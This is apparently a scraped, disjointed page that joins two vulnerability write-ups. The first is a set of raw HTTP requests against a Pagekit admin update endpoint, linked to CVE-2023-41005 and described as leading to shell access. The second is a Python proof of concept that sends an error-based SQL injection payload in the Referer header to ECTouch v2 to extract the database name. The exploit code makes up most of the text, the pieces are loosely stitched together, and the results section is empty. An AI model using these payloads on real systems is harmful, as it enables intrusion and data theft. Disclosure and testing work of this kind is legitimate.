    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
    
    url=constructed_zip_file&_csrf=4eb8d50f82ebae5b1fa16d5177d99ea7d740a8b2
    

    POST /index.php/admin/system/update/update HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cache-Control: max-age=0
    Connection: keep-alive
    Content-Length: 46
    Content-Type: application/x-www-form-urlencoded
    Cookie: Administrator's Cookie
    Host: localhost
    Referer: http://localhost /index.php/admin/system/update/update
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
    
    _csrf=4eb8d50f82ebae5b1fa16d5177d99ea7d740a8b2

CVE-2023-41005: There is a logical flaw that leads to obtaining shell access. · Issue #977 · pagekit/pagekit

ECTouch v2 was discovered to contain a SQL injection vulnerability via the $arr['id'] parameter at \default\helpers\insert.php.

#SQL Injection Vulnerability in ECTouch v2

###Vulnerability Position

In the insert\_bought\_notes function on line 285 in the \\ectouch-main\\include\\apps\\default\\helpers\\insert.php file, the incoming $arr\['id'\] parameter is not verified, resulting in a sql injection vulnerability.

###POC

Use python to write scripts for vulnerability verification.

#!/usr/bin/python
\# -\*- coding: utf-8 -\*-
\# @Author : qyg
\# @File : sqli check for ECTouch v2
\# @function : Detect for SQL injection vulnerabilities in ECTouch.

import requests,re

#your target
target \= 'http://127.0.0.1/'

payload \= '/index.php?m=default&c=user&a=register&u=0'

url \= target + payload

headers \= {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.54',
    'Referer': '554fcae493e564ee0dc75bdf2ebf94cabought\_notes|a:1:{s:2:"id";s:49:"0&&updatexml(1,concat(0x7e,(database()),0x7e),1)#";}'
}

response \= requests.get(url, headers\=headers)

print(response.text)

match \= re.search('XPATH syntax error: \\'~(.\*)~\\'',response.text)

if match:
    print("There is SQL injection vulnerability, and you are currently using the following database:" + match.group(1))

Running results:

Tag

#chrome